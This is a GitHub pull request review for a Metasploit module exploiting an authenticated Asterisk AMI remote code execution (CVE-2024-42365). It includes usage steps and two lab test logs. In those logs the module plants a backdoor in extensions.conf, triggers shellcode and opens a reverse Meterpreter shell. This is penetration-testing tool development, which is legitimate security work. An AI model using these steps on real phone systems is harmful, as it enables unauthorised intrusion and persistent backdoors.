Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Asterisk authenticated rce via AMI (CVE-2024-42365) #19613

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open

Asterisk authenticated rce via AMI (CVE-2024-42365) #19613

wants to merge 5 commits into from
+501 −0

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Nov 1, 2024
edited
Loading

Fixes #19388

Authenticated RCE for Asterisk via AMI for users with originate access, CVE-2024-42365. Hats off to @bcoles for writing a bunch of the underlying functionality which I'm going to move into a lib. Exploit works with certain payloads, needs a cleanup and some more robustness.

  • Install the application
  • Start msfconsole
  • Do: use exploit/linux/misc/asterisk_ami_originate_auth_rce
  • Do: set rhosts <rhost>
  • Do: set lhost <lhost>
  • Do: set username <username>
  • Do: set password <password>
  • You should get a shell.

h00die
h00die commented Nov 4, 2024
View reviewed changes
Copy link
Contributor Author

@h00die h00die left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

will wait for full review to implement these changes

modules/exploits/linux/misc/asterisk_ami_originate_auth_rce.rb Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/misc/asterisk_ami_originate_auth_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/misc/asterisk_ami_originate_auth_rce.md Outdated Show resolved Hide resolved
@h00die h00die changed the title WIP for asterisk rce (CVE-2024-42365) Asterisk authenticated rce via AMI (CVE-2024-42365) Nov 4, 2024
@h00die h00die marked this pull request as ready for review November 4, 2024 21:32
@h00die
Copy link
Contributor Author

h00die commented Nov 11, 2024

Everything else should be addressed!

@jheysel-r7 jheysel-r7 self-assigned this Nov 28, 2024
jheysel-r7
jheysel-r7 reviewed Nov 28, 2024
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the module @h00die. Looks good, just few minor comments. Testing was as expected:

msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
smsf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set verbose true
verbose => true
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Connecting...
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[*] 192.168.123.243:5038 - Authenticating as 'testuser'
[!] 192.168.123.243:5038 - No active DB -- Credential data will not be saved!
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Checking Asterisk version
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Connecting...
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[*] 192.168.123.243:5038 - Authenticating as 'testuser'
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: VTRmMAvWcc
[*] 192.168.123.243:5038 - Loading conf file
[+] 192.168.123.243:5038 -   Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Setting backdoor
[+] 192.168.123.243:5038 -   Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Reloading config
[+] 192.168.123.243:5038 -   Response: Success, Message: Originate successfully queued
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:40994) at 2024-11-28 10:02:39 -0800

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit

lib/msf/core/exploit/remote/asterisk.rb Outdated Show resolved Hide resolved
modules/exploits/linux/misc/asterisk_ami_originate_auth_rce.rb Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/misc/asterisk_ami_originate_auth_rce.md Outdated Show resolved Hide resolved
@h00die
Copy link
Contributor Author

h00die commented Nov 29, 2024

Just tested w/ all changes, still working just fine :)

@jheysel-r7
Copy link
Contributor

Thanks for making those changes! I also just retested and everything was working perfectly :) Landing now

msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set rhost 192.168.123.243
rhost => 192.168.123.243
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
rmsf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: MiCAmsEvkFU
[*] 192.168.123.243:5038 - Loading conf file
[*] 192.168.123.243:5038 - Setting backdoor
[*] 192.168.123.243:5038 - Reloading config
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:49454) at 2024-11-29 09:19:54 -0800

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels
docs library module
Projects
Metasploit Kanban
Status: In Progress
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Asterisk RCE over AMI (CVE-2024-42365)
3 participants
@h00die @jheysel-r7 @jvoisin